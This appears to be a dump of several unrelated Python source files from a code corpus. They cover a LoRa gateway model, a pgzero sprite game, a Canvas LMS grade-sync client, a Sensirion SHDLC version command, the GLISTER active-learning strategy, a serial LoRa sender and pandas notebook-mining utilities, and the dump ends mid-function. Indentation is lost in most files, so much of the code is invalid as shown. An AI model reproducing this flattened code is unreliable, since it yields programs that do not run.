if attr is not None and key not in self.__vars_can_write:
raise ReadOnlyDeny
except AttributeError:
pass
if key in self._assert_switcher:
self._assert_switcher[key](value)
super.__setattr__(self, key, value)
def __init__(self, user_id, mac_addr, name, platform, model, freq_plan=FrequencyPlan.EU863_870, public=True, disable=False, location=None):
"""
:param id: 8 bytes
:param name: str
:param platform: Platform
:return:
"""
self.user_id = user_id
self.id = eui_48_to_64(mac_addr)
self.name = name
self.platform = platform
self.freq_plan = freq_plan
self.public = public
self.disable = disable
self.model = model
if location is not None:
self.location = location
else:
self.location = Location(0.0, 0.0, 0)
def _zip_vars(self):
return dict(zip(self.redis_fields,
(self.user_id, self.platform.name, self.model.name, self.freq_plan.value, self.public.real, self.disable.real, str(self.location))))
def _zip_vars_can_write(self):
dd = {}
for field in self.redis_fields:
if field in self.__vars_can_write:
value = getattr(self, field)
if isinstance(value, enum.Enum):
value = value.value if field == Field.freq_plan else value.name
elif isinstance(value, bool):
value = value.real
dd[field] = value
return dd
def send_restart_request(self):
db0.hset(ConstDB.gateway + hexlify(self.id).decode(), 'restart', 1)
def save(self):
db_sql.session.add(self)
id_str = hexlify(self.id).decode()
key = ConstDB.gateway + id_str
if db0.exists(key):
raise KeyDuplicateError(key)
db0.hmset(key, self._zip_vars())
#save to sql
db_sql.session.commit()
db_sql.session.registry.clear()
def update(self):
print(self._zip_vars_can_write())
db0.hmset(ConstDB.gateway + hexlify(self.id).decode(), self._zip_vars_can_write())
db_sql.session.commit()
def delete(self):
db_sql.session.delete(self)
db_sql.session.commit()
# delete from sql
id = hexlify(self.id).decode()
gateway_trans = db0.keys(pattern=ConstDB.trans_params + '*' + id)
pipe = db0.pipeline()
for key in gateway_trans:
key = key.decode()
pipe.delete(key)
dev_eui = key.split(":")[1]
pipe.zrem(ConstDB.dev_gateways + dev_eui, self.id)
pipe.delete(ConstDB.gateway + id)
pipe.delete(ConstDB.gateway_pull + id)
pipe.execute()
def obj_to_dict(self):
dd = {
'id': hexlify(self.id).decode().upper(),
'mac_addr': hexlify(self.mac_addr).decode().upper(),
'name': self.name,
'platform': self.platform.value,
'model': self.model.value,
'freq_plan': self.freq_plan.value,
'public': self.public,
'disable': self.disable,
'location': self.location.obj_to_dict(),
}
if hasattr(self, 'time'):
dd['last_data'] = self.time
self.get_pull_info()
if hasattr(self, 'ip_addr'):
dd['ip'] = self.ip_addr
if hasattr(self, 'prot_ver'):
dd['ver'] = self.prot_ver
return dd
def get_pull_info(self):
key = ConstDB.gateway_pull + hexlify(self.id).decode()
info = db0.hgetall(key)
if info:
self.ip_addr = info[b'ip_addr'].decode()
self.prot_ver = int(info[b'prot_ver'])
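

# A minimal offline sketch of the Location helper (hypothetical function, made-up Beijing-area
# coordinates): __init__ converts the WGS-84 input to GCJ-02 via eviltransform, str() gives
# the "lng,lat,alt" form stored in redis, and obj_to_dict() gives the API representation.
def _example_location():
    loc = Location(116.3912757, 39.906217, 44)
    return str(loc), loc.obj_to_dict()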
if __name__ == '__main__':
print(Model('IMST')) | 2.046875 | 2 |
okteam/tsurka.py | o-fedorov/okteam | 0 | 12796808 | <gh_stars>0
from typing import Tuple
from pgzero.builtins import Actor
from pygame import Vector2
from .settings import ANIMATION_SPEED, HEIGHT, SPEED, WALK_IMAGES, WIDTH
_TIME = 0.0
ALL = {}
X = Vector2(1, 0)
Y = Vector2(0, 1)
def add(direction: Tuple[int, int]):
actor = Actor(WALK_IMAGES[0])
ALL[actor] = Vector2(direction)
return actor
add((1, 0)).midright = (WIDTH, HEIGHT / 2)
add((0, 1)).midbottom = (WIDTH / 2, HEIGHT)
def draw():
for actor in ALL:
actor.draw()
def update(dt):
global _TIME
_TIME += dt
for actor in ALL:
update_one(actor, dt)
def update_one(actor, dt):
image_num = int(_TIME * ANIMATION_SPEED) % len(WALK_IMAGES)
actor.image = WALK_IMAGES[image_num]
if not image_num:
return
direction = ALL[actor]
delta = direction * SPEED * dt
if actor.left + delta.x <= 0 or actor.right + delta.x >= WIDTH:
ALL[actor] = direction.reflect(X)
delta = delta.reflect(X)
if actor.top + delta.y <= 0 or actor.bottom + delta.y >= HEIGHT:
ALL[actor] = direction.reflect(Y)
delta = delta.reflect(Y)
actor.x += delta.x
actor.y += delta.y
| 2.859375 | 3 |
mission_control/navigator_missions/__init__.py | saltyan007/kill_test | 0 | 12796809 | print "i made it"
from nodes.mission_planner import MissionPlanner | 0.980469 | 1 |
src/ol_openedx_canvas_integration/client.py | MAbdurrehman12/open-edx-plugins | 0 | 12796810 | import logging
import pytz
from urllib.parse import urlencode, urljoin, urlparse, parse_qs
import requests
from django.conf import settings
from ol_openedx_canvas_integration.constants import DEFAULT_ASSIGNMENT_POINTS
log = logging.getLogger(__name__)
class CanvasClient:
def __init__(self, canvas_course_id):
self.session = self.get_canvas_session()
self.canvas_course_id = canvas_course_id
@staticmethod
def get_canvas_session():
"""
Create a request session with the access token
"""
session = requests.Session()
session.headers.update({
"Authorization": "Bearer {token}".format(token=settings.CANVAS_ACCESS_TOKEN)
})
return session
@staticmethod
def _add_per_page(url, per_page):
"""
Add per_page query parameter to override default value of 10
Args:
url (str): The url to update
per_page (int): The new per_page value
Returns:
str: The updated URL
"""
pieces = urlparse(url)
query = parse_qs(pieces.query)
query['per_page'] = per_page
query_string = urlencode(query, doseq=True)
pieces = pieces._replace(query=query_string)
return pieces.geturl()
def _paginate(self, url, *args, **kwargs):
"""
Iterate over the paginated results of a request
"""
url = self._add_per_page(url, 100) # increase per_page to 100 from default of 10
items = []
while url:
resp = self.session.get(url, *args, **kwargs)
resp.raise_for_status()
items.extend(resp.json())
links = requests.utils.parse_header_links(resp.headers["link"])
url = None
for link in links:
if link["rel"] == "next":
url = link["url"]
return items
def list_canvas_enrollments(self):
"""
Fetch canvas enrollments. This may take a while, so don't run in the request thread.
Returns:
dict: Email addresses mapped to canvas user ids for all enrolled users
"""
url = urljoin(
settings.CANVAS_BASE_URL,
"/api/v1/courses/{course_id}/enrollments".format(course_id=self.canvas_course_id)
)
enrollments = self._paginate(url)
return {
enrollment["user"]["login_id"].lower(): enrollment["user"]["id"]
for enrollment in enrollments
}
def list_canvas_assignments(self):
"""
List Canvas assignments
Returns:
list: A list of assignment dicts from Canvas
"""
url = urljoin(settings.CANVAS_BASE_URL, "/api/v1/courses/{course_id}/assignments".format(
course_id=self.canvas_course_id
))
return self._paginate(url)
def get_assignments_by_int_id(self):
assignments = self.list_canvas_assignments()
assignments_dict = {
assignment.get("integration_id"): assignment["id"]
for assignment in assignments
if assignment.get("integration_id") is not None
}
assignments_without_integration_id = sorted([
assignment["id"] for assignment in assignments if assignment.get("integration_id") is None
])
if assignments_without_integration_id:
log.warning(
"These assignments are missing an integration_id: %s",
", ".join(str(assignment_id) for assignment_id in assignments_without_integration_id)
)
return assignments_dict
def list_canvas_grades(self, assignment_id):
"""
List grades for a Canvas assignment
Args:
assignment_id (int): The canvas assignment id
"""
url = urljoin(
settings.CANVAS_BASE_URL,
"/api/v1/courses/{course_id}/assignments/{assignment_id}/submissions".format(
course_id=self.canvas_course_id,
assignment_id=assignment_id,
)
)
return self._paginate(url)
def create_canvas_assignment(self, payload):
"""
Create an assignment on Canvas
Args:
payload (dict):
"""
return self.session.post(
url=urljoin(
settings.CANVAS_BASE_URL,
"/api/v1/courses/{course_id}/assignments".format(course_id=self.canvas_course_id)
),
json=payload,
)
def update_assignment_grades(self, canvas_assignment_id, payload):
return self.session.post(
url=urljoin(
settings.CANVAS_BASE_URL,
"/api/v1/courses/{course_id}/assignments/{assignment_id}/submissions/update_grades".format(
course_id=self.canvas_course_id,
assignment_id=canvas_assignment_id
)
),
data=payload,
)
def create_assignment_payload(subsection_block):
"""
Create a Canvas assignment dict matching a subsection block on edX
Args:
subsection_block (openedx.core.djangoapps.content.block_structure.block_structure.BlockData):
The block data for the graded assignment/exam (in the structure of a course, this unit is a subsection)
Returns:
dict:
Assignment payload to be sent to Canvas to create or update the assignment
"""
return {
"assignment": {
"name": subsection_block.display_name,
"integration_id": str(subsection_block.location),
"grading_type": "percent",
"points_possible": DEFAULT_ASSIGNMENT_POINTS,
"due_at": (
None if not subsection_block.fields.get("due")
# The internal API gives us a TZ-naive datetime for the due date, but Studio indicates that
# the user should enter a UTC datetime for the due date. Coerce this to UTC before creating the
# string representation.
else subsection_block.fields["due"].astimezone(pytz.UTC).isoformat()
),
"submission_types": ["none"],
"published": False,
}
}
def update_grade_payload_kv(user_id, grade_percent):
"""
Returns a key/value pair that will be used in the body of a bulk grade update request
Args:
user_id (int): The Canvas user ID
grade_percent (numpy.float64): The percent score of the grade (between 0 and 1)
Returns:
(tuple): A key/value pair that will be used in the body of a bulk grade update request
"""
return (
"grade_data[{user_id}][posted_grade]".format(user_id=user_id),
"{pct}%".format(pct=grade_percent * 100)
)
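

# A minimal usage sketch (hypothetical helper; the course and assignment IDs are made up and
# Django settings must provide CANVAS_BASE_URL plus a CANVAS_ACCESS_TOKEN that can reach them):
def _example_push_grades(canvas_course_id=1234, canvas_assignment_id=5678):
    client = CanvasClient(canvas_course_id)
    enrollments = client.list_canvas_enrollments()  # email address -> canvas user id
    payload = dict(
        update_grade_payload_kv(user_id, 0.85)  # post 85% for every enrolled user
        for user_id in enrollments.values()
    )
    return client.update_assignment_grades(canvas_assignment_id, payload)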
| 2.359375 | 2 |
sensirion_shdlc_driver/commands/device_version.py | Sensirion/python-shdlc-driver | 3 | 12796811 | <reponame>Sensirion/python-shdlc-driver
# -*- coding: utf-8 -*-
# (c) Copyright 2019 Sensirion AG, Switzerland
from __future__ import absolute_import, division, print_function
from ..command import ShdlcCommand
from ..types import FirmwareVersion, HardwareVersion, ProtocolVersion, Version
import logging
log = logging.getLogger(__name__)
class ShdlcCmdDeviceVersionBase(ShdlcCommand):
"""
SHDLC command 0xD1: "Get Version".
"""
def __init__(self, *args, **kwargs):
super(ShdlcCmdDeviceVersionBase, self).__init__(0xD1, *args, **kwargs)
class ShdlcCmdGetVersion(ShdlcCmdDeviceVersionBase):
def __init__(self):
super(ShdlcCmdGetVersion, self).__init__(
data=[], max_response_time=0.5,
min_response_length=7, max_response_length=7
)
def interpret_response(self, data):
data_bytes = bytearray(data) # Make the [] operator returning a byte
return Version(
firmware=FirmwareVersion(
major=data_bytes[0],
minor=data_bytes[1],
debug=bool(data_bytes[2])
),
hardware=HardwareVersion(
major=data_bytes[3],
minor=data_bytes[4]
),
protocol=ProtocolVersion(
major=data_bytes[5],
minor=data_bytes[6]
)
)
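

# A minimal offline sketch (hypothetical helper; the 7-byte payload is hand-crafted rather than
# read from a real device) showing how raw response bytes map onto the Version object:
def _example_interpret_version_bytes():
    cmd = ShdlcCmdGetVersion()
    # firmware 1.2 (debug flag clear), hardware 3.0, protocol 2.1
    return cmd.interpret_response(b"\x01\x02\x00\x03\x00\x02\x01")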
| 2.421875 | 2 |
swine/terminal/commands/standard/__init__.py | DeflatedPickle/swine | 4 | 12796812 | <filename>swine/terminal/commands/standard/__init__.py<gh_stars>1-10
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from .command_help import CommandHelp
from .command_commands import CommandCommands
| 1.328125 | 1 |
distil/active_learning_strategies/glister.py | SatyadevNtv/distil | 1 | 12796813 | <gh_stars>1-10
from .strategy import Strategy
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.utils.data import DataLoader
import math
class GLISTER(Strategy):
"""
This is implementation of GLISTER-ACTIVE from the paper GLISTER: Generalization based Data
Subset Selection for Efficient and Robust Learning :footcite:`killamsetty2020glister`. GLISTER
methods tries to solve a bi-level optimisation problem.
.. math::
\\overbrace{\\underset{{S \\subseteq {\\mathcal U}, |S| \\leq k}}{\\operatorname{argmin\\hspace{0.7mm}}} L_V(\\underbrace{\\underset{\\theta}{\\operatorname{argmin\\hspace{0.7mm}}} L_T( \\theta, S)}_{inner-level}, {\\mathcal V})}^{outer-level}
    In the above equation, :math:`\\mathcal{U}` denotes the data without labels, i.e. `unlabeled_x`,
:math:`\\mathcal{V}` denotes the validation set that guides the subset selection process, :math:`L_T` denotes the
training loss, :math:`L_V` denotes the validation loss, :math:`S` denotes the data subset selected at each round, and :math:`k` is the `budget`.
    Since solving the complete inner-optimization is expensive, GLISTER-ONLINE adopts an online one-step meta approximation where we approximate the solution to the inner problem
by taking a single gradient step.
The optimization problem after the approximation is as follows:
.. math::
\\overbrace{\\underset{{S \\subseteq {\\mathcal U}, |S| \\leq k}}{\\operatorname{argmin\\hspace{0.7mm}}} L_V(\\underbrace{\\theta - \\eta \\nabla_{\\theta}L_T(\\theta, S)}_{inner-level}, {\\mathcal V})}^{outer-level}
In the above equation, :math:`\\eta` denotes the step-size used for one-step gradient update.
Parameters
----------
    X: Numpy array
        Features of the labeled set of points
    Y: Numpy array
        Labels of the labeled set of points
    unlabeled_x: Numpy array
        Features of the unlabeled set of points
net: class object
Model architecture used for training. Could be instance of models defined in `distil.utils.models` or something similar.
    handler: class object
        It should be a subclass of torch.utils.data.Dataset i.e., have __getitem__ and __len__ methods implemented, so that it could be passed to a pytorch DataLoader. Could be an instance of handlers defined in `distil.utils.DataHandler` or something similar.
    nclasses: int
        No. of classes in the dataset
args: dictionary
This dictionary should have keys 'batch_size' and 'lr'.
        'lr' should be the learning rate used for training. 'batch_size' should be such
        that one can exploit the benefits of tensorization while honouring the resource constraints.
valid: boolean
Whether validation set is passed or not
X_val: Numpy array, optional
Features of the points in the validation set. Mandatory if `valid=True`.
    Y_val: Numpy array, optional
        Labels of the points in the validation set. Mandatory if `valid=True`.
loss_criterion: class object, optional
The type of loss criterion. Default is **torch.nn.CrossEntropyLoss()**
typeOf: str, optional
Determines the type of regulariser to be used. Default is **'none'**.
For random regulariser use **'Rand'**.
        To use the Facility Location set function as a regulariser use **'FacLoc'**.
        To use the Diversity set function as a regulariser use **'Diversity'**.
lam: float, optional
        Determines the amount of regularisation to be applied. Mandatory if `typeOf` is not 'none' and by default set to `None`.
        For the random regulariser, values should be between 0 and 1 as it determines the fraction of points replaced by random points.
For both 'Diversity' and 'FacLoc', `lam` determines the weightage given to them while computing the gain.
kernel_batch_size: int, optional
        For the 'Diversity' and 'FacLoc' regulariser versions, a similarity kernel is to be computed, which
        entails creating a 3d torch tensor of dimensions kernel_batch_size*kernel_batch_size*
        feature dimension. Again, kernel_batch_size should be such that one can exploit the benefits of
        tensorization while honouring the resource constraints.
"""
def __init__(self,X, Y,unlabeled_x, net, handler, nclasses, args,valid,X_val=None,Y_val=None,\
loss_criterion=nn.CrossEntropyLoss(),typeOf='none',lam=None,kernel_batch_size = 200): #
super(GLISTER, self).__init__(X, Y, unlabeled_x, net, handler,nclasses, args)
if valid:
self.X_Val = X_val
self.Y_Val = Y_val
self.loss = loss_criterion
self.valid = valid
self.typeOf = typeOf
self.lam = lam
self.kernel_batch_size = kernel_batch_size
#self.device = "cuda" if torch.cuda.is_available() else "cpu"
def distance(self,x, y, exp = 2):
n = x.size(0)
m = y.size(0)
d = x.size(1)
x = x.unsqueeze(1).expand(n, m, d)
y = y.unsqueeze(0).expand(n, m, d)
if self.typeOf == "FacLoc":
dist = torch.pow(x - y, exp).sum(2)
elif self.typeOf == "Diversity":
dist = torch.exp((-1 * torch.pow(x - y, exp).sum(2))/2)
return dist
def _compute_similarity_kernel(self):
g_is = []
for item in range(math.ceil(len(self.grads_per_elem) / self.kernel_batch_size)):
inputs = self.grads_per_elem[item *self.kernel_batch_size:(item + 1) *self.kernel_batch_size]
g_is.append(inputs)
with torch.no_grad():
new_N = len(self.grads_per_elem)
self.sim_mat = torch.zeros([new_N, new_N], dtype=torch.float32).to(self.device)
first_i = True
for i, g_i in enumerate(g_is, 0):
if first_i:
size_b = g_i.size(0)
first_i = False
for j, g_j in enumerate(g_is, 0):
self.sim_mat[i * size_b: i * size_b + g_i.size(0),
j * size_b: j * size_b + g_j.size(0)] = self.distance(g_i, g_j)
if self.typeOf == "FacLoc":
const = torch.max(self.sim_mat).item()
#self.sim_mat = const - self.sim_mat
self.min_dist = (torch.ones(new_N, dtype=torch.float32)*const).to(self.device)
def _compute_per_element_grads(self):
self.grads_per_elem = self.get_grad_embedding(self.unlabeled_x)
self.prev_grads_sum = torch.sum(self.get_grad_embedding(self.X,self.Y),dim=0).view(1, -1)
def _update_grads_val(self,grads_currX=None, first_init=False):
embDim = self.model.get_embedding_dim()
if first_init:
if self.valid:
if self.X_Val is not None:
loader = DataLoader(self.handler(self.X_Val,self.Y_Val,select=False),shuffle=False,\
batch_size=self.args['batch_size'])
self.out = torch.zeros(self.Y_Val.shape[0], self.target_classes).to(self.device)
self.emb = torch.zeros(self.Y_Val.shape[0], embDim).to(self.device)
else:
raise ValueError("Since Valid is set True, please pass a appropriate Validation set")
else:
predicted_y = self.predict(self.unlabeled_x)
self.X_new = np.concatenate((self.unlabeled_x,self.X), axis = 0)
self.Y_new = np.concatenate((predicted_y,self.Y), axis = 0)
loader = DataLoader(self.handler(self.X_new,self.Y_new,select=False),shuffle=False,\
batch_size=self.args['batch_size'])
self.out = torch.zeros(self.Y_new.shape[0], self.target_classes).to(self.device)
self.emb = torch.zeros(self.Y_new.shape[0], embDim).to(self.device)
self.grads_val_curr = torch.zeros(self.target_classes*(1+embDim), 1).to(self.device)
with torch.no_grad():
for x, y, idxs in loader:
x = x.to(self.device)
y = y.to(self.device)
init_out, init_l1 = self.model(x,last=True)
self.emb[idxs] = init_l1
for j in range(self.target_classes):
try:
self.out[idxs, j] = init_out[:, j] - (1 * self.args['lr'] * (torch.matmul(init_l1, self.prev_grads_sum[0][(j * embDim) +
self.target_classes:((j + 1) * embDim) + self.target_classes].view(-1, 1)) + self.prev_grads_sum[0][j])).view(-1)
except KeyError:
print("Please pass learning rate used during the training")
scores = F.softmax(self.out[idxs], dim=1)
one_hot_label = torch.zeros(len(y), self.target_classes).to(self.device)
one_hot_label.scatter_(1, y.view(-1, 1), 1)
l0_grads = scores - one_hot_label
l0_expand = torch.repeat_interleave(l0_grads, embDim, dim=1)
l1_grads = l0_expand * init_l1.repeat(1, self.target_classes)
self.grads_val_curr += torch.cat((l0_grads, l1_grads), dim=1).sum(dim=0).view(-1, 1)
if self.valid:
self.grads_val_curr /= self.Y_Val.shape[0]
else:
self.grads_val_curr /= predicted_y.shape[0]
elif grads_currX is not None:
# update params:
with torch.no_grad():
for j in range(self.target_classes):
try:
self.out[:, j] = self.out[:, j] - (1 * self.args['lr'] * (torch.matmul(self.emb, grads_currX[0][(j * embDim) +
self.target_classes:((j + 1) * embDim) + self.target_classes].view(-1, 1)) + grads_currX[0][j])).view(-1)
except KeyError:
print("Please pass learning rate used during the training")
scores = F.softmax(self.out, dim=1)
if self.valid:
Y_Val = torch.tensor(self.Y_Val,device=self.device)
one_hot_label = torch.zeros(Y_Val.shape[0], self.target_classes).to(self.device)
one_hot_label.scatter_(1,Y_Val.view(-1, 1), 1)
else:
one_hot_label = torch.zeros(self.Y_new.shape[0], self.target_classes).to(self.device)
one_hot_label.scatter_(1, torch.tensor(self.Y_new,device=self.device).view(-1, 1), 1)
l0_grads = scores - one_hot_label
l0_expand = torch.repeat_interleave(l0_grads, embDim, dim=1)
l1_grads = l0_expand * self.emb.repeat(1, self.target_classes)
self.grads_val_curr = torch.cat((l0_grads, l1_grads), dim=1).mean(dim=0).view(-1, 1)
def eval_taylor_modular(self, grads,greedySet=None,remset=None):
with torch.no_grad():
if self.typeOf == "FacLoc":
gains = torch.matmul(grads, self.grads_val_curr) + self.lam*((self.min_dist - \
torch.min(self.min_dist,self.sim_mat[remset])).sum(1)).view(-1, 1).to(self.device)
elif self.typeOf == "Diversity" and len(greedySet) > 0:
gains = torch.matmul(grads, self.grads_val_curr) - \
self.lam*self.sim_mat[remset][:, greedySet].sum(1).view(-1, 1).to(self.device)
else:
gains = torch.matmul(grads, self.grads_val_curr)
return gains
def select(self, budget):
"""
Select next set of points
Parameters
----------
budget: int
Number of indexes to be returned for next set
Returns
----------
chosen: list
List of selected data point indexes with respect to unlabeled_x
"""
self._compute_per_element_grads()
self._update_grads_val(first_init=True)
numSelected = 0
greedySet = list()
remainSet = list(range(self.unlabeled_x.shape[0]))
if self.typeOf == 'Rand':
if self.lam is not None:
if self.lam >0 and self.lam < 1:
curr_bud = (1-self.lam)*budget
else:
raise ValueError("Lambda value should be between 0 and 1")
else:
raise ValueError("Please pass a appropriate lambda value for random regularisation")
else:
curr_bud = budget
if self.typeOf == "FacLoc" or self.typeOf == "Diversity":
if self.lam is not None:
self._compute_similarity_kernel()
else:
if self.typeOf == "FacLoc":
raise ValueError("Please pass a appropriate lambda value for Facility Location based regularisation")
elif self.typeOf == "Diversity":
raise ValueError("Please pass a appropriate lambda value for Diversity based regularisation")
while (numSelected < curr_bud):
if self.typeOf == "Diversity":
gains = self.eval_taylor_modular(self.grads_per_elem[remainSet],greedySet,remainSet)
elif self.typeOf == "FacLoc":
gains = self.eval_taylor_modular(self.grads_per_elem[remainSet],remset=remainSet)
else:
gains = self.eval_taylor_modular(self.grads_per_elem[remainSet])#rem_grads)
bestId = remainSet[torch.argmax(gains).item()]
greedySet.append(bestId)
remainSet.remove(bestId)
numSelected += 1
self._update_grads_val(self.grads_per_elem[bestId].view(1, -1))
if self.typeOf == "FacLoc":
self.min_dist = torch.min(self.min_dist,self.sim_mat[bestId])
if self.typeOf == 'Rand':
greedySet.extend(list(np.random.choice(remainSet, size=budget - int(curr_bud),replace=False)))
return greedySet | 3 | 3 |
dr-sender.py | valerio-vaccaro/disaster.share | 0 | 12796814 | <gh_stars>0
import time
import serial
import math
import base64
import hashlib
MAX_SIZE = 200
MAGIC = b'BTC'
def serwrite(buff):
for i in range(0, len(buff)):
ser.write(buff[i].encode('ascii'))
time.sleep(0.001)
ser.write('\r'.encode('ascii'))
ser.write('\n'.encode('ascii'))
def serread():
out = ''
while 1:
buf = ser.read(1000).decode('ascii')
time.sleep(0.1)
if len(buf) == 0:
break
out += buf
return out
ser = serial.Serial(
port='/dev/cu.SLAB_USBtoUART',
baudrate=115200,
timeout=0.1,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
xonxoff = False, #disable software flow control
rtscts = False, #disable hardware (RTS/CTS) flow control
dsrdtr = False, #disable hardware (DSR/DTR) flow control
writeTimeout = 2, #timeout for write
)
ser.isOpen()
out = serread()
if out != '':
print(">>" + out)
serwrite('/join BTC')
out = serread()
if out != '':
print(">>" + out)
big_tx_b = b'+'+b'12345678'*200+b'+'
big_tx = base64.a85encode(big_tx_b)
packet_num = math.ceil(len(big_tx)/MAX_SIZE)
hash = hashlib.sha256(big_tx_b).hexdigest()[:8]
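# Chunk the Ascii85-encoded payload into MAX_SIZE-byte pieces; each LoRa message
# carries "MAGIC:hash:index:total:chunk" (hex index/total, first 8 hex chars of
# the SHA-256 of the raw payload) so a receiver can reorder, reassemble and
# verify the transaction.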
for i in range(0, packet_num):
packet = '{}:{}:{}:{}:{}'.format(MAGIC.decode('ascii'), hash, hex(i+1)[2:], hex(packet_num)[2:], big_tx[i*MAX_SIZE:(i+1)*MAX_SIZE].decode('ascii'))
serwrite(packet)
time.sleep(2)
out = serread()
if out != '':
print(">>" + out)
ser.close()
| 2.53125 | 3 |
databutler/mining/kaggle/static_analysis/pandas_mining_utils.py | rbavishi/databutler | 0 | 12796815 | import builtins
import collections
import contextlib
import glob
import io
import os
import string
from typing import Dict, Any, Tuple, List, Collection, Optional
import attrs
import pandas as pd
from databutler.pat import astlib
from databutler.pat.analysis.type_analysis.mypy_types import SerializedMypyType
DF_TYPE = "pandas.core.frame.DataFrame"
SERIES_TYPE = "pandas.core.series.Series"
DF_GROUPBY_TYPE = "pandas.core.groupby.generic.DataFrameGroupBy"
SERIES_GROUPBY_TYPE = "pandas.core.groupby.generic.SeriesGroupBy"
BASE_GROUPBY_TYPE = "pandas.core.groupby.groupby.GroupBy"
GROUPBY_TYPES = {
BASE_GROUPBY_TYPE,
DF_GROUPBY_TYPE,
SERIES_GROUPBY_TYPE,
}
NewTarget = astlib.AstNode
DfArgs = List[str]
SeriesArgs = List[str]
NodeReplMap = Dict[astlib.AstNode, astlib.AstNode]
JsonDict = Dict
_BUILTIN_FUNCS = {k for k in builtins.__dict__ if not k.startswith("_")}
@attrs.define(eq=False, repr=False)
class MinedResult:
code: str
template: str
kind: str
nb_owner: str
nb_slug: str
uid: str
expr_type: Optional[SerializedMypyType]
type_map: Dict[str, SerializedMypyType]
df_vars: List[str]
series_vars: List[str]
template_vars: Dict[str, List[str]]
lib_usages: Dict[str, str] = attrs.field(factory=dict)
def to_json(self) -> JsonDict:
pass
@classmethod
def from_json(cls, json_dict: JsonDict) -> 'MinedResult':
pass
def prettify(self) -> str:
with contextlib.redirect_stdout(io.StringIO()) as f_out:
url = f"https://kaggle.com/{self.nb_owner}/{self.nb_slug}"
print(f"UID: {self.uid}\nKind: {self.kind}\nURL: {url}")
print("----------")
print(f"Code:\n{self.code}")
print("----------")
print(f"Templatized:\n{self.template}")
print("----------")
print(f"Value Type: {'Any' if self.expr_type is None else self.expr_type.type_json}")
print("==========")
return f_out.getvalue()
def __repr__(self):
return self.prettify()
def __str__(self):
return self.prettify()
def is_purely_df_or_series_like(expr_type: SerializedMypyType):
if not (expr_type.equals(DF_TYPE) or expr_type.equals(SERIES_TYPE)):
return False
if expr_type.is_union_type():
return all(is_purely_df_or_series_like(i) or i.is_any_type() for i in expr_type.unpack_union_type())
else:
return True
def find_library_usages(
code_ast: astlib.AstNode
) -> Dict[astlib.Name, str]:
"""Finds variable uses that correspond to imports / library usage"""
# TODO: Perform proper dataflow analysis (reaching defs)
result: Dict[astlib.Name, str] = {}
defs, accesses = astlib.get_definitions_and_accesses(code_ast)
for def_ in defs:
if def_.enclosing_node is not None and isinstance(def_.enclosing_node, (astlib.Import, astlib.ImportFrom)):
key_dict = {}
if isinstance(def_.enclosing_node, astlib.Import):
prefix = ""
elif isinstance(def_.enclosing_node, astlib.ImportFrom) and def_.enclosing_node.module is not None:
prefix = astlib.to_code(def_.enclosing_node.module).strip() + "."
else:
continue
for alias in def_.enclosing_node.names:
name_str = astlib.to_code(alias.name).strip()
if alias.asname is None:
key_dict[name_str] = f"{prefix}{name_str}"
else:
key_dict[astlib.to_code(alias.asname.name).strip()] = f"{prefix}{name_str}"
for access in accesses:
if isinstance(access.node, astlib.Name):
if access.node.value in key_dict:
result[access.node] = key_dict[access.node.value]
return result
def find_constants(code_ast: astlib.AstNode) -> Dict[astlib.BaseExpression, Any]:
"""Finds constant expressions in the AST. Sound but not necessarily complete right now."""
# TODO: Perform proper dataflow analysis (constant propagation)
result: Dict[astlib.BaseExpression, Any] = {}
defs, accesses = astlib.get_definitions_and_accesses(code_ast)
# We will only focus on accesses whose defs are top-level statements to avoid
# having to bother about loops etc.
top_level_stmts = set(astlib.iter_body_stmts(code_ast))
accesses = [a for a in accesses if all(d.enclosing_node in top_level_stmts for d in a.definitions)]
numbering: Dict[astlib.AstNode, int] = {}
for idx, stmt in enumerate(astlib.iter_body_stmts(code_ast)):
for node in astlib.walk(stmt):
numbering[node] = idx
for access in accesses:
num = numbering[access.node]
# Find the closest top-level def
cur, score = None, None
for def_ in access.definitions:
d_num = numbering[def_.enclosing_node]
if d_num < num and (score is None or d_num > score):
cur, score = def_, d_num
if cur is None:
continue
if not isinstance(cur.enclosing_node, (astlib.AnnAssign, astlib.Assign)):
continue
if astlib.is_constant(cur.enclosing_node.value):
val = astlib.get_constant_value(cur.enclosing_node.value)
result[access.node] = val
return result
def replace_constants(
target: astlib.AstNode,
true_exprs: Collection[astlib.BaseExpression],
free_vars: Collection[astlib.Name],
constants: Dict[astlib.BaseExpression, Any],
) -> Tuple[NewTarget, NodeReplMap]:
"""Replace any constant variables with their concrete values, and update the inferred types dict"""
repl_dict = {}
for node in true_exprs:
if (not isinstance(node, astlib.Name)) or node not in free_vars:
continue
if node in constants:
repl_dict[node] = astlib.parse_expr(repr(constants[node]))
if len(repl_dict) == 0:
return target, {n: n for n in astlib.walk(target)}
output_mapping = {}
target = astlib.with_deep_replacements(target, repl_dict, output_mapping)
return target, output_mapping
def has_undefined_references(
target: astlib.AstNode,
free_vars: Collection[astlib.Name],
inferred_types: Dict[astlib.BaseExpression, SerializedMypyType],
lib_usages: Dict[astlib.Name, str],
) -> bool:
"""Checks if there are any undefined variables that are not library usages and not dfs/series"""
for node in free_vars:
if node not in lib_usages:
if node not in inferred_types:
return True
typ = inferred_types[node]
is_builtin_func = typ.is_callable_type() and node.value in _BUILTIN_FUNCS
if not (typ.equals(DF_TYPE) or typ.equals(SERIES_TYPE) or typ.is_bool_type() or is_builtin_func):
return True
return False
def normalize_df_series_vars(
target: astlib.AstNode,
true_exprs: Collection[astlib.BaseExpression],
free_vars: Collection[astlib.Name],
inferred_types: Dict[astlib.BaseExpression, SerializedMypyType],
) -> Tuple[NewTarget, DfArgs, SeriesArgs, NodeReplMap]:
"""Replaces variables corresponding to dataframes or series with standard names"""
seen_dfs: Dict[str, int] = {}
df_repl_map: Dict[astlib.Name, astlib.Name] = {}
seen_series: Dict[str, int] = {}
series_repl_map: Dict[astlib.Name, astlib.Name] = {}
for node in true_exprs:
if (not isinstance(node, astlib.Name)) or node not in inferred_types or node not in free_vars:
continue
# NOTE: If there is a union type of DataFrame and Series, DataFrame will be picked.
if inferred_types[node].equals(DF_TYPE):
if node.value not in seen_dfs:
seen_dfs[node.value] = len(seen_dfs) + 1
df_repl_map[node] = node # Will update later
elif inferred_types[node].equals(SERIES_TYPE):
if node.value not in seen_series:
seen_series[node.value] = len(seen_series) + 1
series_repl_map[node] = node # Will update later
if len({i.value for i in df_repl_map.keys()}) <= 1:
def df_arg_creator(ctr: int):
return "df"
else:
def df_arg_creator(ctr: int):
